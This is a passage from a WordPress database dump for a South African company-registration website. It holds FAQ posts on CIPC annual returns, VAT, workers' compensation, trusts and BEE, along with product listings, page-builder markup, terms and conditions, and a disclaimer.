with an affidavit and all of this can be done online.\r\n\r\nOnce you have purchased the product you will receive an email with a link to complete the online form or you could email the information to us for completion.','publish','open','closed','','bee-affidavit','','','2018-05-15 12:56:18','2018-05-15 10:56:18','',0,'https://companyregistration.online/?post_type=product&#038;p=79',0,'product','',0),(80,2,'2016-03-28 22:13:26','2016-03-28 20:13:26','Most successful business owners agree, starting your company is the best thing they ever did. But before they opened their businesses, they spent countless hours speaking to lawyers, accountants, and other entrepreneurs trying to figure out the next steps.\r\n\r\nSave yourself <strong>money</strong> and <strong>countless hours</strong> — and the possible pain of making huge foundational mistakes — by reading through this report.  If you implement aspects of this report you will be well on your way to building a solid foundation for your business.','What I need to know before I start my business in SA','<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #800080;\">Get the Ebook with the inside scoop.\r\n</span><span style=\"color: #800080;\"> This is what most Entrepreneurs didn\'t know when they started their businesses.</span></h5>\r\n<strong>Contains information about:</strong>\r\n<ul>\r\n 	<li>What\'s in a name and how to get the right name for your business</li>\r\n 	<li>Phases of a business</li>\r\n 	<li>The different types of business entities</li>\r\n 	<li>Tax implications of running a business and the various tax deadlines</li>\r\n 	<li>Making your business legally compliant</li>\r\n</ul>','publish','open','closed','','what-i-need-to-know-before-i-start-my-business','','','2018-05-06 20:40:47','2018-05-06 18:40:47','',0,'https://companyregistration.online/?post_type=product&#038;p=80',0,'product','',0),(83,2,'2016-03-22 12:08:10','2016-03-22 10:08:10','<p style=\"text-align: justify;\">The MOI is defined as a document that sets out the rights and responsibilities of shareholders, directors and other within a company, and by which a company is incorporated in the Act, or by which a pre-existing company was structured and governed.</p>','What is a Memorandum Of Incorporation','','publish','open','open','','what-is-a-memorandum-of-incorporation','','','2016-03-30 14:56:52','2016-03-30 12:56:52','',0,'https://companyregistration.online/?p=83',0,'post','',0),(91,2,'2016-03-22 12:48:46','2016-03-22 10:48:46','All companies and close corporations are required by the Companies Act of 2008 (this differs from the tax return required by the income tax act) to file their annual returns with the CIPC on an annual basis, within a prescribed time period. The purpose for the filing of annual returns is to confirm whether a company or close corporation is still trading. If annual returns are not filed within the prescribed time period, CIPC assumes that the company or close corporation is inactive, and CIPC will start the deregistration process to remove the company or close corporation from its active records. The legal effect of the deregistration process, is that the directors or members is withdrawn and the company or close corporation ceases to exist.','Why should companies file Annual Returns','','publish','open','open','','why-should-companies-file-annual-returns','','','2016-06-15 11:49:21','2016-06-15 09:49:21','',0,'https://companyregistration.online/?p=91',0,'post','',0),(96,2,'2016-03-22 12:59:46','2016-03-22 10:59:46','<p style=\"text-align: justify;\">CK forms are used for Close Corporations and COR forms are used for Companies. Close Corporations can no longer be registered. The benefits that CCs previously enjoyed such as an audit not being required can also are obtained by registering a company in terms of the new company’s act of 2008.</p>','What is the difference between CK Forms and COR forms at CIPC','','publish','open','open','','what-is-the-difference-between-ck-forms-and-cor-forms-at-cipc','','','2016-03-30 15:15:49','2016-03-30 13:15:49','',0,'https://companyregistration.online/?p=96',0,'post','',0),(99,2,'2016-03-22 13:01:36','2016-03-22 11:01:36','Workers\' compensation fund is a form of insurance providing wage replacement and medical benefits to employees injured in the course of employment OR Injuries or diseases caused by the negligence of a worker’s employer or another worker may result in increased compensation. Workers are entitled to compensation if they are injured while working or contract any work-related disease. The Compensation for Occupational Injuries and Diseases Act applies to all employers, casual and full-time workers who, as a result of a workplace accident or work-related disease are injured, disabled, killed or become ill.','What is Workman’s Compensation Fund','','publish','open','open','','what-is-workmans-compensation-fund','','','2016-03-30 15:22:59','2016-03-30 13:22:59','',0,'https://companyregistration.online/?p=99',0,'post','',0),(103,2,'2016-03-22 13:04:01','2016-03-22 11:04:01','Anyone who employs 1 or more workers must register with the Compensation Fund and pay annual assessment fees.','Who must register for Workman’s Compensation Fund','','publish','open','open','','who-must-register-for-workmans-compensation-fund','','','2016-03-30 15:23:40','2016-03-30 13:23:40','',0,'https://companyregistration.online/?p=103',0,'post','',0),(105,2,'2016-03-22 13:15:20','2016-03-22 11:15:20','• Employers are protected against civil claims if a worker is injured on duty.\r\n\r\n• Workers who are injured on duty can claim compensation for temporary or permanent disablement. If workers die as a result of an injury on duty, their dependants can claim compensation.','Benefits of Workman’s Compensation Registration','','publish','open','open','','benefits-of-workmans-compensation-registration','','','2016-03-30 15:24:20','2016-03-30 13:24:20','',0,'https://companyregistration.online/?p=105',0,'post','',0),(109,2,'2016-03-22 13:17:22','2016-03-22 11:17:22','It absolves the employer from any potential liability that may arise if any employee is injured while on duty.','Why must you register for Workman’s Compensation Fund','','publish','open','open','','why-must-you-register-for-workmans-compensation-fund','','','2016-03-30 15:27:37','2016-03-30 13:27:37','',0,'https://companyregistration.online/?p=109',0,'post','',0),(112,2,'2016-03-22 13:20:24','2016-03-22 11:20:24','<p style=\"text-align: justify;\">Executive Directors engages in the day to day management of the company.</p>\r\n<p style=\"text-align: justify;\">A Non-Executive director does not engage in the day-to-day management of the company, but is involved in policy making and planning exercises.</p>','What is the difference between Executive Directors and Non – Executive Directors','','publish','open','open','','what-is-the-difference-between-executive-directors-and-non-executive-directors','','','2016-03-30 15:28:29','2016-03-30 13:28:29','',0,'https://companyregistration.online/?p=112',0,'post','',0),(114,2,'2016-03-22 13:22:10','2016-03-22 11:22:10','Non-Executive directors can:\r\n\r\n● Broaden the horizons and experience of existing executive directors.\r\n\r\n● Facilitate the cross-fertilisation of ideas, particularly in terms of business strategy and planning.\r\n\r\n● Have a vital part to play in appraising and commenting on a company’s investment or expenditure.','What value can a Non -Executive Director bring to a business','','publish','open','open','','what-value-can-a-non-executive-bring-to-a-business','','','2016-03-30 15:30:26','2016-03-30 13:30:26','',0,'https://companyregistration.online/?p=114',0,'post','',0),(118,2,'2016-03-22 13:25:06','2016-03-22 11:25:06','An Annual Return has the purpose to confirm whether CIPC is in possession of the most up to date information of a company or close corporation and that the company or close corporation is still conducting business.\r\n\r\nA tax return focuses on taxable income of a company or close corporation in order to determine the tax liability of the company or close corporation and is filed with SARS. Compliance with the one does not mean that there is automatic compliance with the other. It is two different processes administered in terms of different legislation by two different government departments. Therefore, even if the tax return has been filed with SARS, the Annual Return must still be filed with CIPC.','If a Company or Close Corporation has filed its Income tax returns with SARS, is it still required to file Annual Returns with CIPC','','publish','open','open','','if-a-company-or-close-corporation-has-filed-its-income-tax-returns-with-sars-is-it-still-required-to-file-annual-returns-with-cipc','','','2016-12-01 12:34:53','2016-12-01 10:34:53','',0,'https://companyregistration.online/?p=118',0,'post','',0),(122,2,'2016-03-22 13:27:45','2016-03-22 11:27:45','Vivos Trust also known as testamentary, trust is set up in terms of the will of a person and comes into effect after their death.\r\n\r\nInter Vivos trust is created during the lifetime of a person.','What is the difference between Vivos Trust and Inter Vivos Trust','','publish','open','open','','what-is-the-difference-between-vivos-trust-and-inter-vivos-trust','','','2016-03-30 15:35:39','2016-03-30 13:35:39','',0,'https://companyregistration.online/?p=122',0,'post','',0),(124,2,'2016-03-22 13:30:39','2016-03-22 11:30:39','• The process is more efficient in a trust.\r\n\r\n• Asset protection\r\n\r\n• Minimise estate duty\r\n\r\n• Minimise taxation.','Why would you set up a Vivos Trust if a Will serves the same purpose as the Trust','','publish','open','open','','why-would-you-set-up-a-vivos-trust-if-a-will-serves-the-same-purpose-as-the-trust','','','2016-03-26 21:35:46','2016-03-26 19:35:46','',0,'https://companyregistration.online/?p=124',0,'post','',0),(128,2,'2016-03-22 14:53:04','2016-03-22 12:53:04','A Juristic Person is a company, a close corporation, a body corporate or a trust and a Natural Person is a living, breathing human being.','What is the difference between Juristic Person and a Natural Person','','publish','open','open','','what-is-the-difference-between-natural-person-and-juristic-person','','','2016-03-29 12:51:05','2016-03-29 10:51:05','',0,'https://companyregistration.online/?p=128',0,'post','',0),(132,2,'2016-03-22 15:44:33','2016-03-22 13:44:33','It is compulsory for a person to register for VAT if the taxable supplies made or to be made is in excess of R1 million in any consecutive twelve month period. A person may also choose to register voluntarily if the taxable supplies made in the past period of twelve months exceeded R50 000.','When does a business become liable to register for Value Added Tax','','publish','open','open','','when-does-a-business-become-liable-to-register-for-value-added-tax','','','2016-03-26 16:27:51','2016-03-26 14:27:51','',0,'https://companyregistration.online/?p=132',0,'post','',0),(134,2,'2016-03-22 15:45:50','2016-03-22 13:45:50','A Tax Clearance Certificate is used to validate your status as a taxpayer and also to confirm that the individual or business is tax compliant. A letter of Good standing from Workman’s Compensation is used to prove that the business is registered with Department of Labour and that the business is compliant with Compensation for Occupational Injuries and Diseases Act [COIDA].','What is the difference between a Tax Clearance Certificate and a Letter of Good standing from WCA','','publish','open','open','','what-is-the-difference-between-a-tax-clearance-certificate-and-a-letter-of-good-standing-from-wca','','','2016-03-26 21:44:25','2016-03-26 19:44:25','',0,'https://companyregistration.online/?p=134',0,'post','',0),(136,2,'2016-03-22 15:47:45','2016-03-22 13:47:45','• When applying for a tender\r\n\r\n• In order for you to register on any private or public supplier database\r\n\r\n•Certain suppliers may require a Tax Clearance Certificate before payment can be made to you.\r\n\r\n•To deregister the company with CIPC.','When would you require a Tax Clearance Certificate','','publish','open','open','','when-would-you-require-a-tax-clearance-certificate','','','2016-03-26 21:38:01','2016-03-26 19:38:01','',0,'https://companyregistration.online/?p=136',0,'post','',0),(141,1,'2016-03-22 16:20:17','0000-00-00 00:00:00','','Test Contact Us','','draft','closed','closed','','','','','2016-03-22 16:20:17','2016-03-22 14:20:17','',0,'https://companyregistration.online/?post_type=wr_cf_post_type&#038;p=141',0,'wr_cf_post_type','',0),(144,1,'2016-03-26 16:10:02','2016-03-26 14:10:02','<h3>Which registration is best suited to my business</h3>\r\nIf you wish to run a\r\n<ul>\r\n 	<li>franchise business,</li>\r\n 	<li>grocery shop,</li>\r\n 	<li>butcher,</li>\r\n 	<li>an owner managed  business with a small number of directors of between 1 and 20,</li>\r\n 	<li>etc</li>\r\n</ul>\r\nyou would register a <a href=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-full/\"><strong>private company</strong>.\r\n</a>\r\n\r\n&nbsp;\r\n\r\nIf you wish to register a\r\n<ul>\r\n 	<li>church,</li>\r\n 	<li>welfare organisation or</li>\r\n 	<li>old age home</li>\r\n 	<li>etc</li>\r\n</ul>\r\nyou would register a <strong>non-profit company</strong>. [<a href=\"https://companyregistration.online/contact-us/\">Contact us</a> to register this type of company]\r\n\r\nA private school could be registered as a private company or non-profit company, depending on its objectives.\r\n\r\nAn association of professionals such as\r\n<ul>\r\n 	<li>lawyers,</li>\r\n 	<li>doctors,</li>\r\n 	<li>civil engineers</li>\r\n 	<li>etc,</li>\r\n</ul>\r\nmay be registered as a <a href=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\"><strong>personal liability company</strong>.</a>','Which registration is best suited to my business','','publish','open','open','','what-type-of-company-should-i-register','','','2017-07-07 10:54:40','2017-07-07 08:54:40','',0,'https://companyregistration.online/?p=144',0,'post','',0),(147,1,'2016-03-26 16:23:42','2016-03-26 14:23:42','','Private Company','','publish','closed','closed','','147','','','2019-06-18 11:33:27','2019-06-18 09:33:27','',0,'https://companyregistration.online/uncategorized/147/',2,'nav_menu_item','',0),(173,1,'2016-03-26 21:49:49','2016-03-26 19:49:49',' ','','','publish','closed','closed','','173','','','2019-06-18 11:33:27','2019-06-18 09:33:27','',0,'https://companyregistration.online/uncategorized/173/',1,'nav_menu_item','',0),(174,1,'2016-03-26 21:55:04','2016-03-26 19:55:04','','Private Company registration full','','inherit','open','closed','','private-company-registration-full-cover','','','2016-03-26 21:55:35','2016-03-26 19:55:35','',0,'https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-full-cover.png',0,'attachment','image/png',0),(175,1,'2016-03-22 16:20:17','0000-00-00 00:00:00','','Test Contact Us ( Duplicate )','','draft','closed','closed','','','','','2016-03-22 16:20:17','0000-00-00 00:00:00','',0,'https://companyregistration.online/?post_type=wr_cf_post_type&#038;p=141',0,'wr_cf_post_type','',0),(178,1,'2016-03-28 17:24:01','2016-03-28 15:24:01','[et_pb_section fb_built=\"1\" admin_label=\"Section\" _builder_version=\"3.0.51\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#7cda24\" background_color_gradient_end=\"#0c71c3\" background_color_gradient_direction=\"200deg\" background_color_gradient_start_position=\"22%\"][et_pb_row admin_label=\"Row\" _builder_version=\"3.0.47\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb use_icon=\"on\" font_icon=\"%%71%%\" icon_color=\"rgba(255,255,255,0.71)\" background_layout=\"dark\" use_icon_font_size=\"on\" icon_font_size=\"118px\" _builder_version=\"3.0.51\" header_font_size=\"36px\"]\r\n<h2 style=\"text-align: center;\">Complete the form below</h2>\r\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"3.0.47\" custom_padding=\"2px|0px|0px|0px\"][et_pb_row admin_label=\"row\" _builder_version=\"3.0.47\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_text admin_label=\"Text\" _builder_version=\"3.0.47\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"]\r\n\r\n[caldera_form id=\"CF56f9267c4a9bd\"]\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Private Company Registration Form','','publish','closed','closed','company','private-company-registration-form-2','','','2017-06-18 07:56:27','2017-06-18 05:56:27','',0,'https://companyregistration.online/?page_id=178',0,'page','',0),(183,1,'2016-03-28 18:23:33','2016-03-28 16:23:33','','Private Company registration customised MOI','','inherit','open','closed','','private-company-registration-customised-moi','','','2016-03-28 18:23:46','2016-03-28 16:23:46','',62,'https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI.png',0,'attachment','image/png',0),(184,1,'2016-03-28 19:53:26','2016-03-28 17:53:26','[et_pb_section fb_built=\"1\" _builder_version=\"3.24\"][et_pb_row custom_margin=\"|47px||auto||\" _builder_version=\"3.24\" width=\"93%\" max_width=\"1708px\"][et_pb_column type=\"3_5\" _builder_version=\"3.24\"][et_pb_text _builder_version=\"3.24\" custom_margin=\"||16px|||\" header_font=\"||||||||\" header_font_size=\"34px\"]<h1>Submit Question/Comment</h1>\n[/et_pb_text][et_pb_text _builder_version=\"3.24\"]<iframe frameborder=\"0\" style=\"height: 600px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"3.24\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.24\" custom_padding=\"0px||\"][/et_pb_divider][et_pb_text _builder_version=\"3.24\" custom_margin=\"||10px|||\" header_font=\"|600|||||||\" header_font_size=\"42px\" transform_skew=\"-6deg|-6deg\" animation_style=\"zoom\" animation_direction=\"top\"]<h1 style=\"text-align: center;\">Call Us</h1>\n[/et_pb_text][et_pb_text _builder_version=\"3.24\" custom_margin=\"||8px|||\" header_font=\"||||||||\" header_font_size=\"33px\" text_font=\"||||||||\" text_font_size=\"15px\"]<h1 style=\"text-align: center;\">010-592-7717</h1>\n[/et_pb_text][et_pb_divider divider_weight=\"4px\" _builder_version=\"3.24\"][/et_pb_divider][et_pb_text _builder_version=\"3.24\" custom_margin=\"-10px|||||\" header_font=\"||||||||\" header_font_size=\"37px\"]<h1>Or Visit Us</h1>\n[/et_pb_text][et_pb_text _builder_version=\"3.24\" custom_margin=\"|||\" custom_padding=\"5px|5px|5px|5px\"]<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d7152.366503818647!2d27.8347637!3d-26.320565!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x1e95a606ff9c3e51%3A0x5e1233c7b068d887!2swww.companyregistration.online!5e0!3m2!1sen!2sza!4v1460982421516\" allowfullscreen=\"allowfullscreen\" width=\"600\" height=\"400\" frameborder=\"0\"></iframe><br /> <strong><span style=\"color: #800080;\">Click on the map to obtain directions from your current location to companyregistration.online</span></strong></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact us','','publish','closed','closed','','contact-us','','','2019-06-13 09:36:25','2019-06-13 07:36:25','',0,'https://companyregistration.online/?page_id=184',0,'page','',0),(186,1,'2016-03-28 19:54:25','2016-03-28 17:54:25',' ','','','publish','closed','closed','','186','','','2016-03-28 19:54:25','2016-03-28 17:54:25','',0,'https://companyregistration.online/?p=186',6,'nav_menu_item','',0),(187,1,'2016-03-29 14:15:01','2016-03-29 12:15:01','<!-- wp:divi/placeholder -->\n[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"3.22.3\"][et_pb_row admin_label=\"row\" _builder_version=\"3.22.3\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\"][et_pb_text admin_label=\"Text\" _builder_version=\"3.24\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"]<iframe frameborder=\"0\" style=\"height:700px;width:120%;border:none;\" src=\'https://forms.zohopublic.com/mawincnetwork/form/CompanyRegistration/formperma/mdk0h2jkaD4fmb0Fed11B5_Fh\'></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]\n<!-- /wp:divi/placeholder -->','Company Registration','','publish','closed','closed','company','company-registration','','','2019-06-13 17:02:37','2019-06-13 15:02:37','',0,'https://companyregistration.online/?page_id=187',0,'page','',0),(190,1,'2016-03-28 21:55:37','2016-03-28 19:55:37','','Personal Liability Company','','inherit','open','closed','','personal-liability-company-2','','','2016-03-28 21:55:56','2016-03-28 19:55:56','',64,'https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company.png',0,'attachment','image/png',0),(191,1,'2016-03-28 22:04:26','2016-03-28 20:04:26','','Private Company Customised MOI','','publish','closed','closed','','191','','','2019-06-18 11:33:27','2019-06-18 09:33:27','',0,'https://companyregistration.online/191/',4,'nav_menu_item','',0),(192,1,'2016-03-28 22:04:26','2016-03-28 20:04:26',' ','','','publish','closed','closed','','192','','','2019-06-18 11:33:27','2019-06-18 09:33:27','',0,'https://companyregistration.online/192/',3,'nav_menu_item','',0),(198,1,'2016-03-29 06:31:33','2016-03-29 04:31:33','','BEE Affidavit','','inherit','open','closed','','bee-affidavit-cover-final','','','2016-03-29 06:31:53','2016-03-29 04:31:53','',79,'https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final.png',0,'attachment','image/png',0),(200,1,'2016-03-29 06:42:21','2016-03-29 04:42:21','','Change in Director','','inherit','open','closed','','change-in-director-cover-final','','','2016-03-29 06:42:44','2016-03-29 04:42:44','',65,'https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Director-cover-final.png',0,'attachment','image/png',0),(202,1,'2016-03-29 07:03:25','2016-03-29 05:03:25','','Change in CC Member','','inherit','open','closed','','change-in-member-cover','','','2016-03-29 07:03:47','2016-03-29 05:03:47','',67,'https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Member-cover.png',0,'attachment','image/png',0),(206,1,'2016-03-29 07:39:17','2016-03-29 05:39:17','','Change in Address','','inherit','open','closed','','change-in-address-cover','','','2016-03-29 07:39:35','2016-03-29 05:39:35','',68,'https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover.png',0,'attachment','image/png',0),(217,1,'2016-03-29 10:05:50','2016-03-29 08:05:50','','Importers Exporters Code','','inherit','open','closed','','importers-exporters-code-final','','','2016-03-29 10:06:08','2016-03-29 08:06:08','',78,'https://companyregistration.online/wp-content/uploads/2016/03/Importers-Exporters-Code-final.png',0,'attachment','image/png',0),(225,1,'2016-03-29 14:20:54','2016-03-29 12:20:54','','Customised Website','','inherit','open','closed','','customised-website','','','2016-03-29 14:20:54','2016-03-29 12:20:54','',184,'https://companyregistration.online/wp-content/uploads/2016/03/Customised-Website.jpg',0,'attachment','image/jpeg',0),(226,1,'2016-03-29 16:22:04','2016-03-29 14:22:04','','contact us','','inherit','open','closed','','contact-us-1','','','2016-03-29 16:27:47','2016-03-29 14:27:47','',184,'https://companyregistration.online/wp-content/uploads/2016/03/contact-us-1.jpg',0,'attachment','image/jpeg',0),(227,1,'2016-03-29 16:22:06','2016-03-29 14:22:06','','contact us 3','','inherit','open','closed','','contact-us-3','','','2016-03-29 16:22:06','2016-03-29 14:22:06','',184,'https://companyregistration.online/wp-content/uploads/2016/03/contact-us-3.jpg',0,'attachment','image/jpeg',0),(228,1,'2016-03-29 16:22:09','2016-03-29 14:22:09','','contact us','','inherit','open','closed','','contact-us-2','','','2016-03-29 16:22:09','2016-03-29 14:22:09','',184,'https://companyregistration.online/wp-content/uploads/2016/03/contact-us.jpg',0,'attachment','image/jpeg',0),(229,1,'2016-03-29 16:30:55','2016-03-29 14:30:55','','Call us','','inherit','open','closed','','call-us','','','2016-03-29 16:30:55','2016-03-29 14:30:55','',184,'https://companyregistration.online/wp-content/uploads/2016/03/Call-us.jpg',0,'attachment','image/jpeg',0),(233,1,'2016-03-29 20:07:59','2016-03-29 18:07:59','','Income tax registration','','inherit','open','closed','','income-tax-registration','','','2016-03-29 20:07:59','2016-03-29 18:07:59','',77,'https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration.png',0,'attachment','image/png',0),(234,1,'2016-03-29 20:08:07','2016-03-29 18:08:07','','PAYE registration final','','inherit','open','closed','','paye-registration-final','','','2016-03-29 20:08:07','2016-03-29 18:08:07','',77,'https://companyregistration.online/wp-content/uploads/2016/03/PAYE-registration-final.png',0,'attachment','image/png',0),(235,1,'2016-03-29 20:08:15','2016-03-29 18:08:15','','Vat Registration','','inherit','open','closed','','vat-registration-final','','','2016-03-29 20:08:42','2016-03-29 18:08:42','',77,'https://companyregistration.online/wp-content/uploads/2016/03/Vat-Registration-final.png',0,'attachment','image/png',0),(237,1,'2016-03-29 20:39:31','2016-03-29 18:39:31','<h4>What is VAT?</h4>\r\nValue-Added Tax is commonly known as VAT. VAT is an indirect tax on the consumption of goods and services in the economy. Revenue is raised for government by requiring certain businesses to register and to charge VAT on the taxable supplies of goods and services. These businesses become vendors that act as the agent for government in collecting the VAT.\r\n\r\nVAT is charged at each stage of the production and distribution process and it is proportional to the price charged for the goods and services.\r\n\r\nVAT is presently levied at the standard rate of 14% on the supply of most goods and services and on the importation of goods. The VAT on the importation of goods is collected by customs. There is a limited range of goods and services which are subject to VAT at the zero rate or are exempt from VAT.\r\n\r\n&nbsp;','Urgent VAT Registration','Any person that carries on a business may register for VAT. The<strong> term person</strong> is not only limited to companies but also includes, amongst others, individuals, partnerships, trust funds, foreign donor funded projects and municipalities.\r\n\r\nIt is <strong>mandatory</strong> for a person to register for VAT if the taxable supplies made or to be made is, in excess of R1 million in any consecutive twelve month period.\r\n\r\n<strong><span style=\"color: #800080;\">Turnaround time</span>\r\n1-2 Days</strong> after receiving supporting documentation and information. However if SARS requires a site visit this will take longer. You will then be charged for a <a href=\"https://companyregistration.online/shop/tax-registration/vat-registration/\">normal vat registration</a> and the difference will be <strong>refunded. </strong>Refer to<strong> <a href=\"https://companyregistration.online/shop/tax-registration/vat-registration/\">Vat Registration</a>\r\n</strong>','publish','open','closed','','vat-registration-urgent','','','2018-05-06 19:01:40','2018-05-06 17:01:40','',0,'https://companyregistration.online/shop/tax-registration/vat-registration-urgent/',0,'product','',0),(238,1,'2016-03-29 20:43:31','2016-03-29 18:43:31','','Vat Registration Urgent','','inherit','open','closed','','vat-registration-final-urgent','','','2016-03-29 20:43:53','2016-03-29 18:43:53','',237,'https://companyregistration.online/wp-content/uploads/2016/03/Vat-Registration-final-urgent.png',0,'attachment','image/png',0),(239,1,'2016-03-29 21:05:53','2016-03-29 19:05:53','','Income tax registration','','inherit','open','closed','','income-tax-registration-2','','','2016-03-29 21:06:10','2016-03-29 19:06:10','',74,'https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1.png',0,'attachment','image/png',0),(241,1,'2016-03-29 21:16:28','2016-03-29 19:16:28','','Salary Tax registration','','inherit','open','closed','','paye-registration-final-2','','','2016-03-29 21:17:18','2016-03-29 19:17:18','',75,'https://companyregistration.online/wp-content/uploads/2016/03/PAYE-registration-final-1.png',0,'attachment','image/png',0),(243,1,'2016-03-29 21:23:21','2016-03-29 19:23:21',' ','','','publish','closed','closed','','243','','','2019-06-18 11:33:27','2019-06-18 09:33:27','',0,'https://companyregistration.online/243/',7,'nav_menu_item','',0),(267,2,'2016-04-06 09:29:42','2016-04-06 07:29:42','<p style=\"text-align: justify;\"><b>Exempted Micro Enterprises</b> (<b>EMEs</b>) are businesses that are exempt from measurement in terms of the DTI\'s codes of Good Practice for BEE. They automatically qualify as 100% contributors towards BEE, this offers small South African businesses the opportunity to grow as a result of BEE irrespective of the make-up of the shareholding.</p>\r\n<p style=\"text-align: justify;\">With the new B-BBEE Codes of Good Practice gazetted on 11 October 2013, enterprises with an annual turnover less than R10 million qualify as an EME.</p>\r\n<p style=\"text-align: justify;\">Please note that this does not apply to those who fall within gazetted Sector Codes (i.e those in Construction, Forestry, Tourism, Transport, Chartered Accountancy (CA), Information and Communication Technology (ICT), Property, Agriculture, Financial Services) until these Sector Codes have been updated.</p>\r\n<p style=\"text-align: justify;\">The only requirement is a Sworn Affidavit confirming turnover for the past 12 months and the level of black ownership of an enterprise. EMEs then automatically qualify as follows:</p>\r\n\r\n<ul>\r\n	<li>&lt;51% Black owned will qualify for Level 4 BEE status</li>\r\n	<li>≥51% but &lt;100% Black owned will qualify for Level 2</li>\r\n	<li>100% Black Owned will qualify for Level 1</li>\r\n</ul>','What is Exempted Micro Enterprise (EME)','','publish','open','open','','what-is-exempted-micro-enterprise-eme','','','2016-04-08 10:08:07','2016-04-08 08:08:07','',0,'https://companyregistration.online/?p=267',0,'post','',0),(287,1,'2016-04-07 12:15:14','2016-04-07 10:15:14','<h2>Terms and Conditions www.companyregistration.online</h2>\r\n<h3>Delivery policy</h3>\r\nA buyer may visit www.companyregistration.online and both view the site and opt to purchase/download any service/documentation specified as available for free to purchase/download. This process does not require the anonymous visitor to give a credit card number.\r\n\r\nIf the visitor decides that they would like to purchase a service/document at www.companyregistration.online, they would visit the site, select the required service/documents, and click the checkout button.\r\n\r\nThe buyer is then prompted with one option. The buyer can purchase the service/agreement instantly with a credit card or via instant EFT. If the buyer is in possession of a coupon code these may be used on the checkout page.\r\n\r\nThe buyer will then be redirected to a 3rd party secure payment gateway site, no credit card details are maintained on our site.\r\n\r\nThe buyer will enter a credit card number to make their purchase. When the buyer selects this option they will be taken to a screen that prompts them for credit card purchasing information.\r\n\r\nAfter the form is filled out, the buyer submits their order. Within a short period of time a response page will be displayed. This page will tell the buyer whether the transaction was approved or declined. If the charge was declined, the buyer does not receive any further messages and the transaction ends. If they like, they can click back in the browser and enter a different card number.\r\n\r\nIf the transaction was approved, the buyer will receive a receipt via email from the card processor. This receipt contains the amount that was charged to the card; www.companyregistration.online contact information; support contact information and other details about the transaction.\r\n\r\nAfter the transaction has been verified, the visitor will receive a confirmation that the order is in process and another email once the service is complete or URL to download the file, an access code/password and the expiry date, if applicable.\r\n\r\nThe password/access code is a direct connection from the www.companyregistration.online website.\r\n<h3>Credit Card Refunds</h3>\r\nwww.companyregistration.online only processes refunds to the relevant credit card used at the time of purchase. Please allow 30 days for the refund to appear on your credit card statement. Refunds are subject to www.companyregistration.online terms of purchase.\r\n\r\nIf you not satisfied with your purchase you may cancel the transaction at any time while the transaction is being processed.\r\n\r\nOnce the transaction is complete and we have performed, it cannot be cancelled, except if we have not performed in accordance to information/instructions received.\r\n<h3>Domicilium</h3>\r\nwww.companyregistration.online chooses as its domicilium citandi et executandi for all purposes under this agreement, whether in respect of court process, notice, or other documents or communication of whatsoever nature:\r\n\r\n&nbsp;\r\n<h3>www.companyregistration.online</h3>\r\n101 Rose Avenue\r\nLenasia\r\nJohannesburg\r\n1827\r\n\r\nwww.companyregistration.online is a division of MAW Inc.','Terms and Conditions','','publish','closed','closed','','terms-and-conditions','','','2018-05-05 21:06:21','2018-05-05 19:06:21','',0,'https://companyregistration.online/?page_id=287',0,'page','',0),(293,1,'2016-04-07 12:53:36','2016-04-07 10:53:36','<p style=\"text-align: justify;\">The information contained on these pages is updated on a regular basis. The information is provided by www.companyregistration.online and while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information contained in the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.</p>\r\n<p style=\"text-align: justify;\">In no event will we be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of, or in connection with, the use of this website.</p>\r\n<p style=\"text-align: justify;\">Every effort is made to keep the website up and running smoothly. However, www.companyregistration.online takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.</p>\r\n<p style=\"text-align: justify;\">www.companyregistration.online reserves the right in its absolute discretion to alter, modify, upgrade, update, suspend or withdraw this website or any part hereof at any time.</p>\r\n<p style=\"text-align: justify;\">Visitors agree to forfeit any claims, demands or actions against www.companyregistration.online for damages of any form incurred by the visitors’ use or accessing of this website whether directly or indirectly for any reason whatsoever.</p>','Disclaimer','','publish','closed','closed','','disclaimer','','','2016-04-07 12:53:36','2016-04-07 10:53:36','',0,'https://companyregistration.online/?page_id=293',0,'page','',0),(295,1,'2016-04-07 12:56:43','2016-04-07 